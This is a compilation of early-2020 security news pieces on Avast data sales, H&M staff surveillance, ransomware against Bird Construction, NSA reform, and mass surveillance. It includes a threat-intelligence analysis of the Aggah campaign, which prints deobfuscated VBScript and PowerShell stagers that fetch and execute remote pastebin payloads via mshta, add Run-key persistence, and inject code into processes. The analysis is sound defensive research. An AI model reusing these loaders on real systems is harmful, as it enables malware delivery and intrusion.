
The post SoftServe attains Data Analytics Specialization in Google Cloud Premier Partner Program appeared first on Help Net Security.

Avast antivirus allegedly sold identifiable personal information to third parties

Avast has never made its data collection practices a secret, but a joint report by Vice’s Motherboard and PCMag has revealed that the supposedly anonymized data can still be traced back to specific individuals.

After sifting through leaked user data and company documents, the report published today gave an unobstructed view of the type of data Avast–specifically its subsidiary Jumpshot–collected and sold. Unsurprisingly, some are deeply personal.

The data type Avast hoarded wasn’t the issue, but rather their nuance. In one example, Avast was able to precisely pinpoint a user’s Amazon purchase down to the minute. PCMag argued that Amazon could easily use this information to pinpoint a specific user. Once it’s got a match, the company could then link the user profile to the device ID, which is a constant identifier assigned by Avast for activities generated from the same device.

People took to social media quickly after the news broke to share their thoughts.


Avast allegedly avoided selling information with the device ID attached for that reason, but in 2018, that’s exactly what it sold to marketing provider Omnicom Media Group. The package also contained the users’ age, gender, and clicking timestamps down to the millisecond.

In December 2019, Google Chrome and Mozilla Firefox banned the Avast browser extension over its data collection practices. Following the ban, Avast issued a statement maintaining that it scrubbed all collected data free of personal information. It then continued to collect data through its antivirus software installed in the Windows operating system. These bits of data range from Google and YouTube searches to location and porn habits.

On its website, Avast stated that it has more than 400 million users distributed across 59 countries.

Jumpshot listed IBM, Microsoft, and Google as companies that it has previously worked with. In addition, PCMag also listed Nestle, Purina, Intuit and others as clients.

IT World Canada has reached out to Google, Microsoft, and IBM for comment, but none were immediately available for comment.


Did H&M spy on its German employees? Privacy watchdog opens an investigation

A German privacy watchdog is investigating into clothing retailer H&M because it was allegedly spying on its customer service representatives in Germany.

Hamburg’s data protection commissioner has launched an investigation into Swedish clothing retailer H&M (Hennes & Mauritz) amid evidence that the company was spying on its customer service representatives in Germany.

According to the German privacy watchdog, a hard drive containing about 60 gigabytes of data revealed that superiors at the site in Nuremberg kept “detailed and systematic” records about employees’ private and sensitive data.

“Hamburg’s data protection commissioner said in a statement Monday that a hard drive containing about 60 gigabytes of data revealed that superiors at the site in Nuremberg kept “detailed and systematic” records about employees’ health, from bladder weakness to cancer, and about their private lives, such as family disputes or holiday experiences.” reads a post published by the Associated Press.

Johannes Caspar, the state data protection officer in Hamburg, said the records demonstrate a massive surveillance activity on employees. The records were accessible to all company managers.

“In fact, there was a massive spying out of the employees at the location in Nuremberg,” said Caspar of the German Press Agency. “This has resulted in a significant evaluation of the reports available to us.” 


The situation is very severe for H&M that in response said in a statement that it takes the case “very seriously” and expressed its “honest regret” to the affected staff.

“The qualitative and quantitative extent of the employee data accessible to the entire management level of the company shows a comprehensive research of the employees, which has not been comparable in the past few years,” added Caspar. “It is also health data of those affected, from bladder weakness to cancer, as well as data from people in their social environment, such as family disputes, deaths or holiday experiences.”

The company said that it is offering full cooperation with data protection officials, it also added that its managers had already taken urgent measures in response to the incident.

In the coming weeks, the data protection officer would decide the fines for this case. Let’s remind that according to EU GDPR law, H&M could face a fine of four percent of global annual sales.

Pierluigi Paganini

(SecurityAffairs – H&M, privacy)

The post Did H&M spy on its German employees? Privacy watchdog opens an investigation appeared first on Security Affairs.

Sen. Wyden Asks NSA About Trump Administration Device Security

Senator Voices Concerns in Light of Report That Jeff Bezos' Smartphone Was Hacked
U.S. Senator Ron Wyden, D-Ore., has called on the National Security Agency to take steps to make sure the personal devices of high-ranking Trump administration officials are secure following a report last week that Amazon CEO Jeff Bezos' smartphone had been compromised.

Aggah: How to run a botnet without renting a Server (for more than a year)

Experts from Yoroi-Cybaze ZLab have spotted new attack attempts directed to some Italian companies operating in the Retail sector linked to Aggah campaign.


During the last year, we constantly kept track of the Aggah campaigns. We started deepening inside the Roma225 Campaign and went on with the RG Campaign, contributing to the joint effort to track the offensive activities of this threat actor.

Recently, during our Cyber Defence monitoring operations, we spotted other attack attempts directed to some Italian companies operating in the Retail sector. For this reason, the  Cybaze-Yoroi ZLab team decided to dissect this last Aggah campaign and track its latest variations.

Technical Analysis

ThreatYakka3 Campaign
Brief DescriptionMalicious ppa file dropper with macro

Table 1. Sample information

The initial file is a Microsoft PowerPoint PPA file. It actually is an Add-in file designed to add new behavior to the classic PowerPoint presentations, in this case to add a nasty macro:

Figure 1: Piece of the malicious macro

The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.

Figure 2: Result of the link

The HTML page closely matches the modus operandi of the previous Aggah threat. In this case, the blogspot post is named “20sydney new” but it uses the same trick from the past: hiding the javascript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the mshta engine.

Figure 3: Malicious code hidden in the Blogspot web page and executed by the MSHTA engine

The parameter passed the “unescape()” function results in another two layers of encoded strings, adopting a sort of “matrioska unecape obfuscation”. After these layers, we recovered the malicious logic of the stager:

  1. <script language=”VBScript”>
  2. Set M_c = CreateObject(StrReverse(“llehS.tpircSW”))
  3. Dim L_c
  4. L_c = StrReverse(“exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc”)
  5. M_c.Run L_c, vbHide
  6. set Ixsi = CreateObject(StrReverse(“llehS.tpircSW”))
  7. Dim Bik
  8. Bik1 = “mshta http:\\\raw\JELH48mw”
  9. Bik1, vbHide
  10. set nci = CreateObject(StrReverse(“llehS.tpircSW”))
  11. Dim xx
  12. xx1 = “r “”mshta http:\\\raw\JELH48mw”” /F “
  13. xx0 = StrReverse(“t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs”)
  14. xx0 + xx1, vbHide
  15. Set ll = CreateObject(StrReverse(“llehS.tpircSW”))
  16. no = StrReverse(“mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”)
  17. ll.RegWrite no,”mshta http:\\\raw\NxJCPTmQ”,”REG_SZ”
  18. self.close
  19. </script>

Code Snippet 1

The first part of this initial implant aims to kill the Word and Excel processes. Immediately after that, the malware downloads other code through leveraging mshta once again, this time from a pastebin snippet.

Figure 4: Piece of the malicious Pastebin

The author of this pastes is no more “HAGGA”, as seen in our previous analysis, now the he moved to another one: “YAKKA3”:

Figure 5: Evidence of YAKKA3 Pastebin user

The paste was created on the 25th November 2019 and it has likely been edited many times in the course the last month. In the past Aggah was frequently changing the content of his pastes to modify the malware behaviour and drop many kinds of malware. On some occasions, some of them suspected to be related to the Gorgon APT group. Anyway, during the analysis, the content of the encoded string is the following:

  1. <script language=”VBScript”>
  2. Set MVn = CreateObject(StrReverse(“llehS.tpircSW”))
  3. Mcn = “powershell do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’Dow$_$loadStri$_$g’.replace(‘$_$’,’n’),[Microsoft.VisualBasic.CallType]::Method,’’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’Dow$_$loadStri$_$g’.replace(‘$_$’,’n’),[Microsoft.VisualBasic.CallType]::Method,’’).replace(‘*’,’0x’)|IEX;[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”
  4. MVn.Run Mcn, vbHide
  5. self.close
  6. </script>

Code Snippet 2

The above script is a piece of VBS script designed to run some other Powershell loader. The powershell script tests the internet connectivity by pinging to and then starts the infection. The script downloads two other pastes. The first is a PE file and the second one is a custom .NET process injection utility.

The Injector

ThreatYakka3 Campaign
Brief DescriptionInjector through process hollowing

Table 2. Sample information of the injector 

The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”, as seen in the code snippet 2. The only purpose of this component is to inject a payload inside the memory of another one process, as indicated in the parameter.

Figure 6: Write Process Memory technique

The injection technique is very basic. In fact the injection uses the textbook  “CreateRemoteThread” technique, well documented and used actively implemented by many actors and malware developers. 

Figure 7: Injected payload inside calc.exe process

UAC Bypass Tool

In Code Snippet 1 we saw that the aggah implant persists on the target machine by setting the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command into the Registry Key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so, it potentially loads different payloads on every run.

Figure 8: Piece of the malicious script executed by the persistence mechanism

Unlike previous pastes, the author of this one is YAKKA4. Probably, a form of redundancy in case of take down of the other accounts. 

Figure 9: YAKKA4 evidence

Anyway, the code served by this paste downloads another binary file from an additional Paste site:

  1. <script language=”VBScript”>
  2. Set i9i9 = CreateObject(“W” + “S” + “c” + “r” + “i” + “p” + “t” + “.” + “S” + “h” + “e” + “l” + “l”)
  3. i9i9.Run(“P” + “o” + “w” + “e” + “r” + “s” + “h” + “e” + “l” + “l” + “.” + “e” + “x” + “e -noexit [Byte[]]$sc64= iex(iex(‘(&” + “(GCM *W-O*)’+ ‘Net.’+” + “‘WebC’+’l” + “ient)’+’.Do” + “w’+’nload’+’Str’+’ing(”https://p” + “”).repl” + “ace(”*^*”,”^%$”).r” + “e” + “p” + “l” + “a” + “c” + “e” + “(”^%$”,”0x”)’));[<##>” + “Ap” + “pDomain<##>]::<##>(‘(” + “&$@#$%^&*(urrent” + “Domain’.rep” + “lace(‘(&$@#$%^&*(‘,’C’))<##>.<##>(‘%” + “*&^*&^*&^*&^*&oad’.r” + “eplace(‘%” + “*&^*&^*&^” + “*&^*&” + “‘,’L’))(” + “$sc64).’EntryP” + “oint'<##>.<##>(‘in*&^*” + “&^*&^&*^*&^o” + “k))*()*)(**(&(*&’.r” + “e” + “p” + “l” + “a” + “c” + “e” + “(‘))*()*)(**” + “(&(*&’,’e’).r” + “e” + “p” + “l” + “a” + “c” + “e” + “(‘*&^” + “*&^*&^&*^*&^’,’v’))($null,$null)”),0
  4. self.close
  5. </script>

Code Snippet 3

This last binary actually is a hacking tool implementing the CMSTP Bypass technique, a technique used to bypass Windows UAC prompts. 

According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.

However, the cyber attackers could exploit an infected INF file to execute arbitrary commands bypassing the UAC, elevating privileges in a stealthy way. In this case the CMSTP Bypass technique implemented into a .NET executable. 

  Figure 10: Synthesis of the CMSTP Bypass technique

The Payload

As we saw in the past, Aggah used to change its payloads during time, and this time we observed that the delivered malware was not RevengeRAT. It rather was a LokiBot variant. This info stealer is well-known in the community since 2016 and it was deeply analyzed in the course of the years. 

In this case, it has the following configuration:

Figure 11: Loki Bot configuration with communication to the C2

The December Payloads

As anticipated before, Aggah payloads are quite dynamic. According to the some observation of community researches such as @DrStache, the Aggah pastebin accounts were dropping AZOrult infostealer few days before the Lokibot observation. 

Investigating the c2 infrastructure through the Azorult-Tracker services, we noticed the AZOrult malware distributed by Aggah in that period was targeting a modest number of victims mainly located in the United States, United Arab Emirates and also Pakistan, Germany and Israel. 


The Aggah actor keeps threatening organizations all around the world. During the time it built a custom stager implant based on legit third parties services, such as Pastebin and BlogSpot, abused by the actor to manage the infected hosts and to run its botnet without renting a server. 

During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.

In conclusion, there is no hard evidence confirming or denying its potential relationships with the Gorgon APT, and factors like the different nationalities and the small amount of victims connected to December Aggah activities, does not help to exclude it.

Further technical details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by Yoroy-Cybaze Z-Lab:

Pierluigi Paganini

(SecurityAffairs – Aggah, botnet)

The post Aggah: How to run a botnet without renting a Server (for more than a year) appeared first on Security Affairs.

Russian Cybercrime Boss Burkov Pleads Guilty

Aleksei Burkov, an ultra-connected Russian hacker once described as “an asset of supreme importance” to Moscow, has pleaded guilty in a U.S. court to running a site that sold stolen payment card data and to administering a highly secretive crime forum that counted among its members some of the most elite Russian cybercrooks.

Aleksei Burkov, seated second from right, attends a hearing in Jerusalem in 2015. Andrei Shirokov / Tass via Getty Images.

Burkov, 29, admitted to running CardPlanet, a site that sold more than 150,000 stolen credit card accounts, and to being the founder and administrator of DirectConnection — a closely guarded underground community that attracted some of the world’s most-wanted Russian hackers. He pleaded guilty last week in a Virginia court to access device fraud and conspiracy to commit computer intrusion, identity theft, wire fraud and money laundering.

As KrebsOnSecurity noted in a November 2019 profile of Burkov’s hacker nickname ‘k0pa,’ “a deep dive into the various pseudonyms allegedly used by Burkov suggests this individual may be one of the most connected and skilled malicious hackers ever apprehended by U.S. authorities, and that the Russian government is probably concerned that he simply knows too much.”

Membership in the DirectConnection fraud forum was heavily restricted. New members had to be native Russian speakers, provide a $5,000 deposit, and be vouched for by three existing crime forum members. Also, members needed to have a special encryption certificate installed in their Web browser before the forum’s login page would even load.

DirectConnection was something of a Who’s Who of major cybercriminals, and many of its most well-known members have likewise been extradited to and prosecuted by the United States. Those include Sergey “Fly” Vovnenko, who was sentenced to 41 months in prison for operating a botnet and stealing login and payment card data. Vovnenko also served as administrator of his own cybercrime forum, which he used in 2013 to carry out a plan to have Yours Truly framed for heroin possession.

As noted in last year’s profile of Burkov, an early and important member of DirectConnection was a hacker who went by the moniker “aqua” and ran the banking sub-forum on Burkov’s site. In December 2019, The FBI has offered a $5 million bounty leading to the arrest and conviction of aqua, who’s been identified as Maksim Viktorovich Yakubets. The Justice Department says Yakubets/aqua ran a transnational cybercrime organization called “Evil Corp.” that stole roughly $100 million from victims.

In this 2011 screenshot of DirectConnection, we can see the nickname of “aqua,” who ran the “banking” sub-forum on DirectConecttion. Aqua, a.k.a. Maksim V. Yakubets of Russia, now has a $5 million bounty on his head from the FBI.

According to a statement of facts in Burkov’s case, the author of the infamous SpyEye banking trojanAleksandr “Gribodemon” Panin — was personally vouched for by Burkov. Panin was sentenced in 2016 to 24 years in prison.

Other top DirectConnection members include convicted credit card fraudsters Vladislav “Badb” Horohorin and Sergey “zo0mer” Kozerev, as well as the infamous spammer and botnet master Peter “Severa” Levashov.

Burkov was arrested in 2015 on an international warrant while he was visiting Israel, and over the ensuing four years the Russian government aggressively sought to keep him from being extradited to the United States. When Israeli authorities turned down requests to send him back to Russia — supposedly to face separate hacking charges there — the Russians then imprisoned a young Israeli woman on trumped-up drug charges in a bid to trade prisoners.

As the news outlet Haaretz reported in October, Naama Issachar was arrested while changing planes in Russia on her way home from a yoga course in India. Russian police said they found approximately 10 grams of marijuana in Issachar’s bag. Issachar denied smuggling drugs, saying she had not sought to enter Russia during her layover and had no access to her luggage during her brief stay in the Russian airport.

Haaretz noted that the Russian government pressed Israel to exchange Burkov for Issachar. When Israel’s supreme court cleared the way for Burkov’s extradition to the United States, Issachar was found guilty of drug smuggling and sentenced to 7.5 years in jail.

But according to a story today in The Times of Israel, the Kremlin has signaled that Russian President Vladimir Putin may make a decision “in the near future,” on a possible pardon for Issachar, whose mother reportedly met with Putin while the Russian leader was visiting Israel last week.

Burkov currently is scheduled to be sentenced on May 8. He faces a maximum sentence of 15 years in prison.

Modern Mass Surveillance: Identify, Correlate, Discriminate

Communities across the United States are starting to ban facial recognition technologies. In May of last year, San Francisco banned facial recognition; the neighboring city of Oakland soon followed, as did Somerville and Brookline in Massachusetts (a statewide ban may follow). In December, San Diego suspended a facial recognition program in advance of a new statewide law, which declared it illegal, coming into effect. Forty major music festivals pledged not to use the technology, and activists are calling for a nationwide ban. Many Democratic presidential candidates support at least a partial ban on the technology.

These efforts are well-intentioned, but facial recognition bans are the wrong way to fight against modern surveillance. Focusing on one particular identification method misconstrues the nature of the surveillance society we're in the process of building. Ubiquitous mass surveillance is increasingly the norm. In countries like China, a surveillance infrastructure is being built by the government for social control. In countries like the United States, it's being built by corporations in order to influence our buying behavior, and is incidentally used by the government.

In all cases, modern mass surveillance has three broad components: identification, correlation and discrimination. Let's take them in turn.

Facial recognition is a technology that can be used to identify people without their knowledge or consent. It relies on the prevalence of cameras, which are becoming both more powerful and smaller, and machine learning technologies that can match the output of these cameras with images from a database of existing photos.

But that's just one identification technology among many. People can be identified at a distance by their heartbeat or by their gait, using a laser-based system. Cameras are so good that they can read fingerprints and iris patterns from meters away. And even without any of these technologies, we can always be identified because our smartphones broadcast unique numbers called MAC addresses. Other things identify us as well: our phone numbers, our credit card numbers, the license plates on our cars. China, for example, uses multiple identification technologies to support its surveillance state.

Once we are identified, the data about who we are and what we are doing can be correlated with other data collected at other times. This might be movement data, which can be used to "follow" us as we move throughout our day. It can be purchasing data, Internet browsing data, or data about who we talk to via email or text. It might be data about our income, ethnicity, lifestyle, profession and interests. There is an entire industry of data brokers who make a living analyzing and augmenting data about who we are ­-- using surveillance data collected by all sorts of companies and then sold without our knowledge or consent.

There is a huge ­-- and almost entirely unregulated ­-- data broker industry in the United States that trades on our information. This is how large Internet companies like Google and Facebook make their money. It's not just that they know who we are, it's that they correlate what they know about us to create profiles about who we are and what our interests are. This is why many companies buy license plate data from states. It's also why companies like Google are buying health records, and part of the reason Google bought the company Fitbit, along with all of its data.

The whole purpose of this process is for companies --­ and governments ­-- to treat individuals differently. We are shown different ads on the Internet and receive different offers for credit cards. Smart billboards display different advertisements based on who we are. In the future, we might be treated differently when we walk into a store, just as we currently are when we visit websites.

The point is that it doesn't matter which technology is used to identify people. That there currently is no comprehensive database of heartbeats or gaits doesn't make the technologies that gather them any less effective. And most of the time, it doesn't matter if identification isn't tied to a real name. What's important is that we can be consistently identified over time. We might be completely anonymous in a system that uses unique cookies to track us as we browse the Internet, but the same process of correlation and discrimination still occurs. It's the same with faces; we can be tracked as we move around a store or shopping mall, even if that tracking isn't tied to a specific name. And that anonymity is fragile: If we ever order something online with a credit card, or purchase something with a credit card in a store, then suddenly our real names are attached to what was anonymous tracking information.

Regulating this system means addressing all three steps of the process. A ban on facial recognition won't make any difference if, in response, surveillance systems switch to identifying people by smartphone MAC addresses. The problem is that we are being identified without our knowledge or consent, and society needs rules about when that is permissible.

Similarly, we need rules about how our data can be combined with other data, and then bought and sold without our knowledge or consent. The data broker industry is almost entirely unregulated; there's only one law ­-- passed in Vermont in 2018 ­-- that requires data brokers to register and explain in broad terms what kind of data they collect. The large Internet surveillance companies like Facebook and Google collect dossiers on us are more detailed than those of any police state of the previous century. Reasonable laws would prevent the worst of their abuses.

Finally, we need better rules about when and how it is permissible for companies to discriminate. Discrimination based on protected characteristics like race and gender is already illegal, but those rules are ineffectual against the current technologies of surveillance and control. When people can be identified and their data correlated at a speed and scale previously unseen, we need new rules.

Today, facial recognition technologies are receiving the brunt of the tech backlash, but focusing on them misses the point. We need to have a serious conversation about all the technologies of identification, correlation and discrimination, and decide how much we as a society want to be spied on by governments and corporations -- and what sorts of influence we want them to have over our lives.

This essay previously appeared in the New York Times.

EDITED TO ADD: Rereading this post-publication, I see that it comes off as overly critical of those who are doing activism in this space. Writing the piece, I wasn't thinking about political tactics. I was thinking about the technologies that support surveillance capitalism, and law enforcement's usage of that corporate platform. Of course it makes sense to focus on face recognition in the short term. It's something that's easy to explain, viscerally creepy, and obviously actionable. It also makes sense to focus specifically on law enforcement's use of the technology; there are clear civil and constitutional rights issues. The fact that law enforcement is so deeply involved in the technology's marketing feels wrong. And the technology is currently being deployed in Hong Kong against political protesters. It's why the issue has momentum, and why we've gotten the small wins we've had. (The EU is considering a five-year ban on face recognition technologies.) Those wins build momentum, which lead to more wins. I should have been kinder to those in the trenches.

If you want to help, sign the petition from Public Voice calling on a moratorium on facial recognition technology for mass surveillance. Or write to your US congressperson and demand similar action. There's more information from EFF and EPIC.

Cloudy with a Chance of Extremely High Alert Accuracy

You can tell it’s raining by sticking your head out the door; but what’s the likelihood of it stopping in the next hour? What’s the temperature and relative humidity? Suddenly the need for analytics is apparent. Without it, the chance of getting soaked on any given day would dramatically increase.

Analytics makes the world go ‘round. So why shouldn’t it be the same in security? According to our CISO Benchmark Study, only 35% of respondents said it was easy to determine the scope of a compromise, contain it, and remediate it. This is where analytics can come in, helping to turn the tide. Analytics are becoming increasingly critical for security, and when done right, can significantly improve an organization’s risk posture.

With so much at stake, cybersecurity should be seamless, precise, and manageable. Unfortunately, as I elaborated on in my last blog post, that’s not often the case. Organizations have become accustomed to purchasing and using too many security products without having enough people to manage them – resulting in more alerts than can be digested.

Forecast: Advanced Analytics   

We understand the importance of delivering security intelligence that can be easily obtained, understood, and responded to in a timely manner. Seventy-seven percent of our customers say that our industry-leading Network Traffic Analysis (NTA) solution, Cisco Stealthwatch, has reduced their time to detect and remediate threats from months to hours, and has provided a fast return on investment.

Stealthwatch provides enterprise-wide visibility from the private network to the public cloud – including from endpoints and encrypted traffic. It delivers comprehensive situational awareness to help organizations detect, prioritize, and mitigate threats in real time.

Customers Enhance Security with Stealthwatch

The in-depth visibility and robust analytics provided by Stealthwatch translate into high-fidelity alerts, dramatically decreasing the need to manually sift through massive amounts of information to pinpoint a security threat. In fact, our customers consistently rate greater than 90 percent of the alerts they receive from Stealthwatch as “helpful,” meaning they lead to something that definitely needs attention. Minimizing noise and zeroing in on what’s most important is a requirement for effectively protecting today’s complex, modernized environments.

  • According to the Durham County Government, Stealthwatch has increased visibility and detection of internal threats by at least 80% and has reduced incident response time by 90%.
  • According to Dimension Data, Stealthwatch has decreased incident response time by over 100 days.
  • And with Stealthwatch, J. Crew Group can now respond to incidents in 10-15 minutes.

A Platform Approach to Security

Stealthwatch is part of a portfolio of products that work together as a team, learning from each other and improving each other’s effectiveness. For example, Stealthwatch integrates with our incident response portal, Cisco Threat Response, and our security policy management tool, Cisco Defense Orchestrator. We also integrate third-party solutions to deliver more thorough and impactful defenses.

Stealthwatch leverages many aspects of our platform approach to security – including integration, automation, and machine learning – to harden networks and simplify protection. It’s like knowing with confidence what the weather will be like all day and having exactly the right kind of clothes to stay comfortable and dry.

Learn More

If you are joining us this week at Cisco Live in Barcelona, come check out Stealthwatch at one of the sessions or experience a demo within the Security area at the World of Solutions. Or, learn more about Stealthwatch here and take our free 2-week visibility assessment to see how powerful security analytics can quickly surface threats that might be lurking within your network.

The post Cloudy with a Chance of Extremely High Alert Accuracy appeared first on Cisco Blogs.

US Rolls Out New Bill to Reform NSA Surveillance

US Rolls Out New Bill to Reform NSA Surveillance

US senators have proposed a bill that would drastically reform the surveillance practices of the National Security Agency (NSA) and increase oversight of government surveillance.

Titled The Safeguarding Americans’ Private Records Act, the bill was introduced on Thursday by Senators Ron Wyden, Zoe Lofgren, Pramila Jayapal, Warren Davidson, and Steve Daines. 

According to a statement on Wyden's website, the changes proposed in the bill will "protect Americans’ rights against unnecessary government surveillance." 

The bill comes ahead of the March 15 expiration of Section 215 of the Patriot Act, which the National Security Agency "used to create a secret mass surveillance program that swept up millions of Americans’ phone calls." The phone record program was terminated last year.

The bill prohibits the "warrantless collection of cell site location and GPS information as well as browsing history and internet search history and ensures that the government cannot conduct collection for intelligence purposes that would violate the Fourth Amendment in the criminal context."

Furthermore, the bill aims to establish the Foreign Intelligence Surveillance Act (FISA) process as the only process by which the government is allowed to carry out surveillance. By doing this, the bill intends to close what it describes as "secret law" loopholes that have allowed the US government to clandestinely conduct surveillance outside the FISA process in the past

Other reforms proposed by the bill are the increase of congressional oversight of government surveillance activities with the addition of new public reporting requirements regarding Americans whose information has been collected under Sections 215 and 702 of the Patriot Act. 

Commenting on the new bill, Jack Mannino, CEO at Virginia-based application security provider nVisium, said: "These are important steps towards protecting the civil liberties and Fourth Amendment rights of citizens. Intelligence agencies do important work, and it's necessary for them to be able to do their jobs, while preserving legal and moral boundaries. States, such as California, have passed legislation to protect internet privacy, and other states are quickly moving in the same direction. Overreaching surveillance erodes trust in the systems we use and our expectation of privacy."

Ontario construction firm victim of ransomware attack

A multi-million dollar Ontario construction firm that has worked on major federal and provincial projects including facilities for national defence and police stations has been hit by a ransomware attack.

According to CBC News, Bird Construction of Mississauga, Ont., acknowledged that it was recently victimized, but didn’t give any details.

“Bird Construction responded to a cyber incident that resulted in the encryption of company files,” the CBC quoted an unnamed company spokesperson as saying. “Bird continued to function with no business impact, and we worked with leading cybersecurity experts to restore access to the affected files.”

IT World Canada has been trying unsuccessfully to get hold of the company.


Rogers’ internal passwords and source code found open on GitHub

Brett Callow,  a British Columbia-based security analyst with the anti-virus software firm Emsisoft, told IT World Canada that in December the group behind the Maze ransomware posted a note on its site that it had infected the construction company’s systems. The Maze group includes data theft among its strategies, using the threat of releasing some data to pressure victims into paying up. That December note was one of a list of companies Maze said hadn’t co-operated, so their data might be released.

It isn’t clear from the company’s statement if it paid a ransom. But Callow said that for a brief period of time the employee records of a few Bird Construction employees — including their social insurance numbers — were posted on the Maze site. In addition, a document from Calgary-based Suncor Energy that didn’t have personally identifiable information was briefly published by Maze.

“It’s not at all unlikely that the actors are still in possession of the data,” Callow said in an email. “Even if Bird paid the ransom, it seems likely that the criminals would retain the data as they are able to use or monetize at a later date.”

Callow added he has major concerns around the exfiltration and blackmail tactics that are being deployed.

“Based on what we see, it seems many companies are quietly paying ransoms and then making no form of disclosure (the U.K. press is currently looking into another case). And, of course, that means employees and customers do not find out that their data has been exposed and so do not know that they should take action,” he explained.

For its fiscal year ending December 2018 Bird Construction had operating revenue of $1.3 billion and a net loss of $1 million. The fiscal 2019 results haven’t been announced yet. In November the company recorded a third-quarter net income of $6.8 million on construction revenue of $378 million. In December the company said it had signed a subcontract with the consortium building the second stage of an extension of Ottawa’s light rail transit line. Its job will be to build seven of the 16 stations and a light maintenance and storage facility. No value for that contract was announced.

Over the years Bird Construction has built or been part of consortiums for a number of facilities across Canada, some of them which could be considered sensitive. These include the $263 million RCMP’s southern B.C. headquarters in Surrey; 18 facilities for the Ontario Provincial Police, an aircraft maintenance hangar for Canadian Force base at Trenton, Ont.; and the $104 million expansion of helicopter facilities at the air force base in Dartmouth, Nova Scotia.

New privacy assessments now included in Microsoft Compliance Score

Keeping up with rapidly changing regulatory requirements has become one of the biggest challenge’s organizations face today. Just as companies finished preparing for the General Data Protection Regulation (GDPR), California’s privacy regulation—California Consumer Privacy Act (CCPA)—went into effect on January 1, 2020. And in August 2020, Brazil’s own GDPR-like regulation, Lei Geral de Proteção de Dados (LGPD), will start to be enforced.

To help you take a proactive role in getting ahead of privacy compliance, we’re announcing new privacy-focused assessments available in the public preview of Microsoft Compliance Score. These new assessments help you assess your compliance posture and provide guidance to implement more effective controls for CCPA, LGPD, ISO/IEC 27701:2019, and SOC 1 Type 2 and SOC 2 Type 2.

To learn more, read Microsoft Compliance Score helps address the ever-changing data privacy landscape.

The post New privacy assessments now included in Microsoft Compliance Score appeared first on Microsoft Security.

Major Canadian Military Contractor Compromised in Ransomware Attack

Major Canadian Military Contractor Compromised in Ransomware Attack

A Canadian construction company that won military and government contracts worth millions of dollars has suffered a ransomware attack. 

General contractor Bird Construction, which is based in Toronto, was allegedly targeted by cyber-threat group MAZE in December 2019. MAZE claims to have stolen 60 GB of data from the company, which landed 48 contracts worth $406m with Canada's Department of National Defense between 2006 and 2015.

In an email to the Canadian Broadcasting Corporation (CBC), a Bird Construction company spokesperson wrote: "Bird Construction responded to a cyber incident that resulted in the encryption of company files. Bird continued to function with no business impact, and we worked with leading cyber security experts to restore access to the affected files."

MAZE's modus operandi is to demand a ransom from its victim to secure the return of data that the group has stolen and encrypted. Victims are warned that failure to pay up will result in the data's publication. If a victim refuses to pay, MAZE's next move is typically to publish a small quantity of the data it claims to have stolen to show it means business.

According to Emsisoft threat analyst Brett Callow, MAZE has now published data it claims to have stolen from Bird Construction. The published files contain employees' personal data and information relating to Canadian company Suncor Energy, with which Bird Construction has worked on multiple projects. 

Callow told Infosecurity Magazine: "Maze actually published some of Bird’s data. The files included documents relating to Suncor and records for a couple of Bird employees which included their names, home addresses, phone numbers, banking info, social insurance numbers, tax forms, health numbers, drug and alcohol test results—everything that a criminal would need to steal their identity. And all that info was posted on the clear web where anybody could’ve accessed it." 

The published data, which Infosecurity Magazine has viewed, consisted of two large PDF files, each relating to a separate Bird Construction employee, plus documents detailing vehicle entry authorization and alcohol and drug testing procedures at Suncor.

Callow added: "The big question is: what else did MAZE get and did any of the data relate to Bird's government and military contracts?" 

Bird Construction has not said whether a ransom was paid to its cyber-attackers. Callow advised any company that gets hit by ransomware not to pay up.

He said: "There is no way for a company to know that the data will be deleted after a ransom has been paid. In fact, it probably will not be deleted. Why would a criminal enterprise delete data that they may be able to use or monetize at a later date?"

What You Should Actually Learn From a Pentest Report

Dakota Nelson // Unknown Unknowns: So you’ve been pentested. Congrats! It might not feel like it, but this will eventually leave you more confident about your security, not less. The real question is – why might it not feel like it? Pentest findings can be broken down many ways, of course – the obvious one […]

The post What You Should Actually Learn From a Pentest Report appeared first on Black Hills Information Security.

US Space Industry to Launch Cybersecurity Portal

US Space Industry to Launch Cybersecurity Portal

Spring 2020 will see the launch of a new US cybersecurity resource designed to protect the space industry. 

Space News reported last Thursday that the Space Information Sharing and Analysis Center, or Space ISAC, is currently in the process of setting up an unclassified portal where companies can share and analyze information on cybersecurity threats. The portal will go live in the tail end of spring. 

The activation of the portal will mark the official start of operations for Space ISAC, which was formally established in April 2019 as a nonprofit organization during a classified session at the 35th Space Symposium in Colorado Springs, Colorado. 

The need to establish a Space ISAC to secure commercial, government, and military space communications from cyber-attacks on global space assets was recognized by the Science & Technology Partnership Forum in 2017. The Forum shared its vision for the organization’s conception in April 2018 at the 34th Space Symposium.

Space ISAC was founded initially by Kratos Defense & Security Solutions. Ten other companies have since joined as founding members, though some wish to keep their connection with the organization under wraps. Firms that have made their membership of Space ISAC public include Booz Allen Hamilton, SES, Parsons Corp, Lockheed Martin, and MITRE, which all joined as founding members.

The senior vice president of Kratos and chairman of the board for Space ISAC, Frank Backes, said that once the new portal is in operation, Space ISAC will work to recruit and vet potential members. The organization is hoping to sign up as many as 200 member companies from the civil, commercial, and national security space sectors.

Annual membership fees will be $10,000 for silver membership, $25,000 for gold, and $50,000 for platinum; however, the organization will consider offering lower rates to small enterprises and startups.

